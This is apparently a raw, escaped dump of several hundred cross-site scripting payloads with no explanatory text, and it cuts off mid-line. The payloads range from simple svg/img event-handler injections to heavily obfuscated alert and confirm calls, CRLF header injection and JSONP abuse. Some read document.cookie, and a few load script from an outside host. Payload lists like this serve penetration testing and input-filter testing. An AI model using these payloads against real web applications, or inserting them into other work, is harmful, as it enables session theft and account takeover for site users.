a{}b{animation:a;}&lt;/style&gt;&lt;b/onanimationstart=prompt`${document.domain}&amp;#x60;&gt;\\r\\n&lt;d3v/onauxclick=[2].some(confirm)&gt;click\\r\\n&lt;marquee+loop=1+width=0+onfinish=\\\&#039;new+Function`al\\\\ert\\\\`1\\\\``\\\&#039;&gt;\\r\\n{1==1}\\\&quot;&gt;&lt;object+data=javascript%26colon%3b\\\&#039;str1ng\\\&#039;.replace(\\\&#039;1\\\&#039;,alert)&gt;\\r\\n\\\&#039;&gt;&lt;img src=x onError=prompt(\\\&quot;OpenBugBounty\\\&quot;)&gt;\\r\\n\\\&#039;&gt;&lt;img+sRc=l+oNerrOr=prompt(document.cookie)+x&gt;\\r\\n\\\&quot;&gt;&lt;object+data=javascript%26%63%6f%6c%6f%6e%3b\\\&#039;straccessng\\\&#039;.replace(\\\&#039;access\\\&#039;,alert)&gt;\\r\\n&lt;svg/ \\\\/\\\\/%20%20%20%20%20onload%20%20%20%20%20 =%20%20%20%20%20%20%20 window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&gt;\\r\\n&lt;svg/ subsoloprivxss \\\\/\\\\/%20%20%20%20%20onload%20%20%20%20%20 =%20%20%20%20%20%20%20 window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&gt;\\r\\n&lt;script&gt;x = \\\&#039;&lt;!--&lt;script&gt;\\\&#039;/*&lt;/script&gt;--&gt;*/;alert(1)&lt;/script\\r\\n&lt;svg onload=\\\&quot;import(\\\&#039;data:text/javascript,al\\\&#039;+\\\&#039;\\\&#039;+\\\&#039;ert(0)\\\&#039;)\\\&quot;&gt;\\r\\n&lt;image src\\\\r\\\\n=valid.jpg onloadend=\\\&#039;new class extends (co\\\\u006efir\\\\u006d)/**/`` &amp;lcub;&amp;rcub;\\\&#039;&gt;\\r\\n&lt;details/open/ontoggle=\\\&quot;self[\\\&#039;wind\\\&#039;%2b\\\&#039;ow\\\&#039;][\\\&#039;one\\\&#039;%2b\\\&#039;rror\\\&#039;]=self[\\\&#039;wind\\\&#039;%2b\\\&#039;ow\\\&#039;][\\\&#039;ale\\\&#039;%2b\\\&#039;rt\\\&#039;];throw/**/self[\\\&#039;doc\\\&#039;%2b\\\&#039;ument\\\&#039;][\\\&#039;domain\\\&#039;];\\\&quot;&gt;\\r\\n&lt;&lt;/p&gt;iframe src=javascript:alert()//\\r\\n&lt;bleh/onclick=top[/al/.source+/ert/.source]&amp;Tab;``&gt;click\\r\\n&lt;head&gt;&lt;/head&gt;&lt;body&gt;padding&lt;bleh onclick=\\\&quot;top[/al/.source+/ert/.source] ``\\\&quot;&gt;clickpadding&lt;/bleh&gt;&lt;/body&gt;\\r\\n&lt;details onauxclick=confirm`xss`&gt;&lt;/details&gt;\\r\\n&lt;frameset onpageshow=alert(1)&gt;\\r\\n&lt;svg onunload=http://window.open (\\\&#039;javascript:alert(1)\\\&#039;)&gt;\\r\\n&lt;xss class=progress-bar-animated onanimationstart=alert(1)&gt;\\r\\n&lt;xss&lt;script&gt;&gt;&amp;28;prompt();&amp;28;&lt;&lt;/script&gt;/xss&gt;\\r\\n&lt;svg&gt;&lt;b&gt;&lt;style&gt;&lt;img id=\\\&quot;&amp;lt;/style&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;\\\&quot;&gt;\\r\\n&lt;img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;&gt;\\r\\n&lt;svg%0Aonauxclick=0;[1].some(confirm)//\\r\\n&lt;&lt;/div&gt;script&lt;/div&gt;&gt;alert()&lt;&lt;/div&gt;/script&lt;/div&gt;&gt;\\r\\n&lt;svg onload=alert(1)&gt;\\r\\n\\\&quot;&gt;&lt;svg onload=alert(1)&gt;\\r\\n&lt;/tag&gt;&lt;svg onload=alert(1)&gt;\\r\\n\\\&quot;&gt;&lt;/tag&gt;&lt;svg onload=alert(1)&gt;\\r\\n\\\&quot;onmouseover=alert(1) //\\r\\n\\\&quot;autofocus onfocus=alert(1) //\\r\\n&lt;img src=something onauxclick=\\\&quot;new Function `al\\\\ert\\\\`xss\\\\``\\\&quot;&gt;\\r\\n&lt;svg id=javascript:alert(10) onload=location=id&gt;\\r\\n&lt;svg/onload=%26nbsp;alert`bohdan`+\\r\\n1\\\&#039;\\\&quot;&gt;&lt;img/src/onerror=.1|alert``&gt;\\r\\n&lt;img src=\\\&quot;img-src\\\&quot; onloadstart=\\\&quot;alert(45)\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;img-src\\\&quot; onloadend=\\\&quot;alert(45)\\\&quot;&gt;\\r\\n&lt;img src onerror=%26emsp;prompt`${document.domain}`&gt;\\r\\n\\\&#039;-alert(1)-\\\&#039;\\r\\n\\\&#039;-alert(1)//\\r\\n\\\\\\\&#039;-alert(1)//\\r\\n&lt;/script&gt;&lt;svg onload=alert(1)&gt;\\r\\n\\\&#039;}alert(1);{\\\&#039;\\r\\n\\\&#039;}alert(1)%0A{\\\&#039;\\r\\n\\\\\\\&#039;}alert(1);{//\\r\\n-alert(1)//\\\\\\r\\n-alert(1)}//\\\\\\r\\n${alert(1)}\\r\\n\\\&#039;onload=alert(1)&gt;&lt;svg/1=\\\&#039;\\r\\n\\\&#039;&gt;alert(1)&lt;/script&gt;&lt;script/1=\\\&#039;\\r\\n*/alert(1)&lt;/script&gt;&lt;script&gt;/*\\r\\n*/alert(1)\\\&quot;&gt;\\\&#039;onload=\\\&quot;/*&lt;svg/1=\\\&#039;\\r\\n`-alert(1)\\\&quot;&gt;\\\&#039;onload=\\\&quot;`&lt;svg/1=\\\&#039;\\r\\n*/&lt;/script&gt;\\\&#039;&gt;alert(1)/*&lt;script/1=\\\&#039;\\r\\np=&lt;svg/1=\\\&#039;&amp;q=\\\&#039;onload=alert(1)&gt;\\r\\np=&lt;svg 1=\\\&#039;&amp;q=\\\&#039;onload=\\\&#039;/*&amp;r=*/alert(1)\\\&#039;&gt;\\r\\nq=&lt;script/&amp;q=/src=data:&amp;q=alert(1)&gt;\\r\\n\\\&quot;&gt;&lt;svg onload=alert(1)&gt;.gif\\r\\n&lt;svg xmlns=\\\&quot;http://www.w3.org/2000/svg\\\&quot; onload=\\\&quot;alert(1)\\\&quot;/&gt;\\r\\n&lt;img src=1 onerror=alert(1)&gt;\\r\\n&lt;iframe src=javascript:alert(1)&gt;\\r\\n&lt;details open ontoggle=alert(1)&gt;\\r\\n&lt;svg&gt;&lt;svg onload=alert(1)&gt;\\r\\ndata:text/html,&lt;img src=1 onerror=alert(1)&gt;\\r\\ndata:text/html,&lt;iframe src=javascript:alert(1)&gt;\\r\\n&gt;&lt;svg onload=alert(1)&gt;?a=reader\\r\\n&lt;script src=data:,alert(1)&gt;\\r\\n&lt;script src=//brutelogic.com.br/1.js&gt;\\r\\n&lt;iframe src=TARGET_URL onload=\\\&quot;frames[0].postMessage(\\\&#039;INJECTION\\\&#039;,\\\&#039;*\\\&#039;)\\\&quot;&gt;\\r\\n&lt;x:script xmlns:x=\\\&quot;http://www.w3.org/1999/xhtml\\\&quot;&gt;alert(1)&lt;/x:script&gt;\\r\\n&lt;x:script xmlns:x=\\\&quot;http://www.w3.org/1999/xhtml\\\&quot; src=\\\&quot;//brutelogic.com.br/1.js\\\&quot;/&gt;\\r\\n%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript\\r\\n%3Ealert(1)%3C/script%3E\\r\\n%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D\\r\\n%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E\\r\\n&lt;p style=overflow:auto;font-size:999px onscroll=alert(1)&gt;AAA&lt;x/id=y&gt;&lt;/p&gt;#y\\r\\n&lt;&lt;!--%23set var=\\\&quot;x\\\&quot; value=\\\&quot;svg onload=alert(1)\\\&quot;--&gt;&lt;!--%23echo var=\\\&quot;x\\\&quot;--&gt;&gt;\\r\\n1&lt;svg onload=alert(1)&gt;\\r\\n1\\\&quot;&gt;&lt;svg onload=alert(1)&gt;\\r\\n\\\&#039;1&lt;svg onload=alert(1)&gt;\\r\\n&lt;svg onload=alert(1)&gt;\\\\\\r\\n&lt;Svg OnLoad=alert(1)&gt;\\r\\n&lt;Script&gt;alert(1)&lt;/Script&gt;\\r\\n&lt;svg onload=alert(1)//\\r\\n&lt;svg onload=\\\&quot;alert(1)\\\&quot;\\r\\n&lt;SVG ONLOAD=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;\\r\\n&lt;SCRIPT SRC=//BRUTELOGIC.COM.BR/1&gt;&lt;/SCRIPT&gt;\\r\\n&lt;script/x&gt;alert(1)&lt;/script&gt;\\r\\n%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E\\r\\n%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E\\r\\nalert`1`\\r\\nsetTimeout`alert\\\\x28document.domain\\\\x29`\\r\\nsetInterval`alert\\\\x28document.domain\\\\x29`\\r\\n&lt;svg onload=alert&amp;lpar;1&amp;rpar;&gt;\\r\\n&lt;svg onload=alert&amp;#40;1&amp;#41&gt;\\r\\n[][\\\&#039;\\\\146\\\\151\\\\154\\\\164\\\\145\\\\162\\\&#039;][\\\&#039;\\\\143\\\\157\\\\156\\\\163\\\\164\\\\162\\\\165\\\\143\\\\164\\\\157\\\\162\\\&#039;](\\\&#039;\\\\141\\\\154\\\\145\\\\162\\\\164\\\\50\\\\61\\\\51\\\&#039;)()\\r\\n(alert)(1)\\r\\na=alert,a(1)\\r\\n[1].find(alert)\\r\\ntop[\\\&quot;al\\\&quot;+\\\&quot;ert\\\&quot;](1)\\r\\ntop[/al/.source+/ert/.source](1)\\r\\nal\\\\u0065rt(1)\\r\\ntop[\\\&#039;al\\\\145rt\\\&#039;](1)\\r\\ntop[8680439..toString(30)](1)\\r\\ntop.open`javas\\\\cript:al\\\\ert(1)`\\r\\n\\\&quot;o&lt;x&gt;nmouseover=alert&lt;x&gt;(1)//\\r\\n\\\&quot;autof&lt;x&gt;ocus o&lt;x&gt;nfocus=alert&lt;x&gt;(1)//\\r\\n&lt;script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);&gt;&lt;/script&gt;\\r\\n&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n&lt;script src=data:,alert(1)&gt;\\r\\n&lt;iframe src=javascript:alert(1)&gt;\\r\\n&lt;embed src=javascript:alert(1)&gt;\\r\\n&lt;a href=javascript:alert(1)&gt;click\\r\\n&lt;math&gt;&lt;brute href=javascript:alert(1)&gt;click\\r\\n&lt;form action=javascript:alert(1)&gt;&lt;input type=submit&gt;\\r\\n&lt;isindex action=javascript:alert(1) type=submit value=click&gt;\\r\\n&lt;form&gt;&lt;button formaction=javascript:alert(1)&gt;click\\r\\n&lt;form&gt;&lt;input formaction=javascript:alert(1) type=submit value=click&gt;\\r\\n&lt;form&gt;&lt;input formaction=javascript:alert(1) type=image value=click&gt;\\r\\n&lt;form&gt;&lt;input formaction=javascript:alert(1) type=image src=SOURCE&gt;\\r\\n&lt;isindex formaction=javascript:alert(1) type=submit value=click&gt;\\r\\n&lt;object data=javascript:alert(1)&gt;\\r\\n&lt;iframe srcdoc=&lt;svg/o&amp;#x6Eload&amp;equals;alert&amp;lpar;1)&amp;gt;&gt;\\r\\n&lt;svg&gt;&lt;script xlink:href=data:,alert(1) /&gt;\\r\\n&lt;math&gt;&lt;brute xlink:href=javascript:alert(1)&gt;click\\r\\n&lt;x contenteditable onblur=alert(1)&gt;lose focus!\\r\\n&lt;x onclick=alert(1)&gt;click this!\\r\\n&lt;x oncopy=alert(1)&gt;copy this!\\r\\n&lt;x oncontextmenu=alert(1)&gt;right click this!\\r\\n&lt;x onauxclick=alert(1)&gt;right click this!\\r\\n&lt;x oncut=alert(1)&gt;copy this!\\r\\n&lt;x ondblclick=alert(1)&gt;double click this!\\r\\n&lt;x ondrag=alert(1)&gt;drag this!\\r\\n&lt;x contenteditable onfocus=alert(1)&gt;focus this!\\r\\n&lt;x contenteditable oninput=alert(1)&gt;input here!\\r\\n&lt;x contenteditable onkeydown=alert(1)&gt;press any key!\\r\\n&lt;x contenteditable onkeypress=alert(1)&gt;press any key!\\r\\n&lt;x contenteditable onkeyup=alert(1)&gt;press any key!\\r\\n&lt;x onmousedown=alert(1)&gt;click this!\\r\\n&lt;x onmousemove=alert(1)&gt;hover this!\\r\\n&lt;x onmouseout=alert(1)&gt;hover this!\\r\\n&lt;x onmouseover=alert(1)&gt;hover this!\\r\\n&lt;x onmouseup=alert(1)&gt;click this!\\r\\n&lt;x contenteditable onpaste=alert(1)&gt;paste here!\\r\\n\\\&#039;-alert(1)-\\\&#039;&lt;svg&gt;\\r\\n\\\\\\\&#039;-alert(1)//&lt;svg&gt;\\r\\n&lt;svg/on&lt;script&gt;&lt;script&gt;load=alert(1)//&lt;/script&gt;\\r\\n&lt;SCRİPT&gt;alert(1)&lt;/SCRİPT&gt;\\r\\n&lt;SCRİPT/SRC=data:,alert(1)&gt;\\r\\n%CA%BA&gt;%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)&gt;\\r\\n&lt;svg&gt;&lt;set onbegin=alert(1)&gt;\\r\\n&lt;svg&gt;&lt;set end=1 onend=alert(1)&gt;\\r\\n%u003Csvg onload=alert(1)&gt;\\r\\n%u3008svg onload=alert(2)&gt;\\r\\n%uFF1Csvg onload=alert(3)&gt;\\r\\n\\\&quot;&gt;&lt;svg/onload=alert(1)&gt;\\\&quot;@x.y\\r\\n\\\\74svg o\\\\156load\\\\75alert\\\\501\\\\51\\\\76\\r\\n&lt;/script&gt;&lt;svg&gt;&lt;script&gt;alert(1)//\\r\\n&lt;/script&gt;&lt;script&gt;\\\&#039;%0B\\\&#039;-alert(1)//\\r\\n\\\&quot;`-alert(1)&lt;/script&gt;&lt;script&gt;`\\r\\n?p[&lt;script&gt;`]=`/alert(1)&lt;/script&gt;\\r\\n\\\&#039;;onerror=alert;throw 1//\\r\\n\\\&quot;\\\&#039;&gt;confirm&amp;lpar;1)&lt;/Script&gt;&lt;Svg&gt;&lt;Script/1=\\\&#039;\\r\\n%01Jav%09asc%09ript:https://DOMAIN/%250Acon%09firm%25%281%25%29\\r\\n&lt;x onmouseenter=alert(1)&gt;\\r\\n&lt;x onafterscriptexecute=alert(1)&gt;\\r\\n&lt;x onbeforescriptexecute=alert(1)&gt;\\r\\n&lt;x onanimationend=alert(1)&gt;&lt;style&gt;x{animation:s}@keyframes s{}\\r\\n&lt;x onwebkitanimationend=alert(1)&gt;&lt;style&gt;x{animation:s}@keyframes s{}\\r\\n&lt;svg&gt;&lt;use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x&gt;\\r\\n&lt;/Script/\\\&quot;\\\&#039;--&gt;&lt;Body /Autofocus /OnFocus = confirm`1` &lt;!--&gt;\\r\\nPC9TY3JpcHQvIictLT48Qm9keSAvQXV0b2ZvY3VzIC9PbkZvY3VzID0gY29uZmlybWAxYCA8IS0tPg==\\r\\n&lt;html ontouchstart=alert(1)&gt;\\r\\n&lt;html ontouchend=alert(1)&gt;\\r\\n&lt;html ontouchmove=alert(1)&gt;\\r\\n&lt;body onorientationchange=alert(1)&gt;\\r\\n&lt;body onload=alert(1)&gt;\\r\\n&lt;body onpageshow=alert(1)&gt;\\r\\n&lt;body onfocus=alert(1)&gt;\\r\\n&lt;body onhashchange=alert(1)&gt;&lt;a href=%23x&gt;click this!#x\\r\\n&lt;body style=overflow:auto;height:1000px onscroll=alert(1) id=x&gt;#x\\r\\n&lt;body onscroll=alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;\\r\\n&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;\\r\\n&lt;br&gt;&lt;x id=x&gt;#x\\r\\n&lt;body onresize=alert(1)&gt;press F12!\\r\\n&lt;body onhelp=alert(1)&gt;press F1!\\r\\n&lt;marquee onstart=alert(1)&gt;\\r\\n&lt;marquee loop=1 width=0 onfinish=alert(1)&gt;\\r\\n&lt;audio src onloadstart=alert(1)&gt;\\r\\n&lt;video onloadstart=alert(1)&gt;&lt;source&gt;\\r\\n&lt;input autofocus onblur=alert(1)&gt;\\r\\n&lt;keygen autofocus onfocus=alert(1)&gt;\\r\\n&lt;form onsubmit=alert(1)&gt;&lt;input type=submit&gt;\\r\\n&lt;select onchange=alert(1)&gt;&lt;option&gt;1&lt;option&gt;2\\r\\n&lt;menu id=x contextmenu=x onshow=alert(1)&gt;right click me!\\r\\n&lt;object onerror=alert(1)&gt;\\r\\nz\\\&quot; onmouseover=\\\&quot;alert(\\\&#039;Hackerone\\\&#039;)\\\&quot; style=\\\&quot;position:fixed;left:0;top:0;width:9999px;height:9999px;\\\&quot;&gt;\\r\\n%3Csvg%2Fx%3D%22%3E%22%2F%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E()%2F%2F\\r\\n%3Csvg/x=%22%3E%22/%3Cscript%3Ealert(document.cookie)%3C/script%3E()//\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;-confirm`1`-\\\&#039;\\r\\n\\\&#039;-document.write`&lt;h1&gt;juniorEXPLOIT&lt;/h1&gt;`-\\\&#039;\\r\\n%22&gt;&lt;svg%20onload=confirm(1);&gt;\\r\\n\\\&#039;&lt;\\\&#039;/\\\&#039;&gt;&lt;\\\&#039;s\\\&#039;t\\\&#039;y\\\&#039;l\\\&#039;e\\\&#039;/\\\&#039;o\\\&#039;n\\\&#039;l\\\&#039;o\\\&#039;a\\\&#039;d\\\&#039;=\\\&#039;a\\\&#039;l\\\&#039;e\\\&#039;r\\\&#039;t(\\\&#039;1\\\&#039;)\\\&#039;&gt;\\r\\n&lt;script\\\\x20type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x3Etype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Dtype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x09type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Ctype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x2Ftype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Atype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x3Cscript&gt;javascript:alert(1)&lt;/script&gt; \\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x00script&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;img src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/img&gt;\\r\\n&lt;audio src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/audio&gt;\\r\\n&lt;video src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/video&gt;\\r\\n&lt;body src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/body&gt;\\r\\n&lt;image src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/image&gt;\\r\\n&lt;object src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;script src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;svg onResize svg onResize=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onResize&gt;\\r\\n&lt;title onPropertyChange title onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/title onPropertyChange&gt;\\r\\n&lt;iframe onLoad iframe onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onLoad&gt;\\r\\n&lt;body onMouseEnter body onMouseEnter=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onMouseEnter&gt;\\r\\n&lt;body onFocus body onFocus=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onFocus&gt;\\r\\n&lt;frameset onScroll frameset onScroll=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/frameset onScroll&gt;\\r\\n&lt;script onReadyStateChange script onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/script onReadyStateChange&gt;\\r\\n&lt;html onMouseUp html onMouseUp=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseUp&gt;\\r\\n&lt;body onPropertyChange body onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPropertyChange&gt;\\r\\n&lt;svg onLoad svg onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onLoad&gt;\\r\\n&lt;body onPageHide body onPageHide=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPageHide&gt;\\r\\n&lt;body onMouseOver body onMouseOver=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onMouseOver&gt;\\r\\n&lt;body onUnload body onUnload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onUnload&gt;\\r\\n&lt;body onLoad body onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onLoad&gt;\\r\\n&lt;bgsound onPropertyChange bgsound onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/bgsound onPropertyChange&gt;\\r\\n&lt;html onMouseLeave html onMouseLeave=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseLeave&gt;\\r\\n&lt;html onMouseWheel html onMouseWheel=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseWheel&gt;\\r\\n&lt;style onLoad style onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/style onLoad&gt;\\r\\n&lt;iframe onReadyStateChange iframe onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onReadyStateChange&gt;\\r\\n&lt;body onPageShow body onPageShow=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPageShow&gt;\\r\\n&lt;style onReadyStateChange style onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/style onReadyStateChange&gt;\\r\\n&lt;frameset onFocus frameset onFocus=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/frameset onFocus&gt;\\r\\n&lt;applet onError applet onError=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onError&gt;\\r\\n&lt;marquee onStart marquee onStart=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/marquee onStart&gt;\\r\\n&lt;script onLoad script onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/script onLoad&gt;\\r\\n&lt;html onMouseOver html onMouseOver=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseOver&gt;\\r\\n&lt;html onMouseEnter html onMouseEnter=\\\&quot;javascript:parent.javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseEnter&gt;\\r\\n&lt;body onBeforeUnload body onBeforeUnload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onBeforeUnload&gt;\\r\\n&lt;html onMouseDown html onMouseDown=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseDown&gt;\\r\\n&lt;marquee onScroll marquee onScroll=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/marquee onScroll&gt;\\r\\n&lt;xml onPropertyChange xml onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/xml onPropertyChange&gt;\\r\\n&lt;frameset onBlur frameset onBlur=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/frameset onBlur&gt;\\r\\n&lt;applet onReadyStateChange applet onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onReadyStateChange&gt;\\r\\n&lt;svg onUnload svg onUnload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onUnload&gt;\\r\\n&lt;html onMouseOut html onMouseOut=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseOut&gt;\\r\\n&lt;body onMouseMove body onMouseMove=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onMouseMove&gt;\\r\\n&lt;body onResize body onResize=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onResize&gt;\\r\\n&lt;object onError object onError=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/object onError&gt;\\r\\n&lt;body onPopState body onPopState=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPopState&gt;\\r\\n&lt;html onMouseMove html onMouseMove=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseMove&gt;\\r\\n&lt;applet onreadystatechange applet onreadystatechange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onreadystatechange&gt;\\r\\n&lt;body onpagehide body onpagehide=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onpagehide&gt;\\r\\n&lt;svg onunload svg onunload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onunload&gt;\\r\\n&lt;applet onerror applet onerror=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onerror&gt;\\r\\n&lt;body onkeyup body onkeyup=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onkeyup&gt;\\r\\n&lt;body onunload body onunload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onunload&gt;\\r\\n&lt;iframe onload iframe onload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onload&gt;\\r\\n&lt;body onload body onload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onload&gt;\\r\\n&lt;html onmouseover html onmouseover=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onmouseover&gt;\\r\\n&lt;object onbeforeload object onbeforeload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/object onbeforeload&gt;\\r\\n&lt;body onbeforeunload body onbeforeunload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onbeforeunload&gt;\\r\\n&lt;body onfocus body onfocus=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onfocus&gt;\\r\\n&lt;body onkeydown body onkeydown=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onkeydown&gt;\\r\\n&lt;iframe onbeforeload iframe onbeforeload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onbeforeload&gt;\\r\\n&lt;iframe src iframe src=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe src&gt;\\r\\n&lt;svg onload svg onload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onload&gt;\\r\\n&lt;html onmousemove html onmousemove=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onmousemove&gt;\\r\\n&lt;body onblur body onblur=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onblur&gt;\\r\\n\\\\x3Cscript&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&#039;\\\&quot;`&gt;&lt;script&gt;/* *\\\\x2Fjavascript:alert(1)// */&lt;/script&gt;\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script\\\\x0D\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script\\\\x0A\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script\\\\x0B\\r\\n&lt;script charset=\\\&quot;\\\\x22&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;!--\\\\x3E&lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- ---&gt; &lt;img src=xxx:x 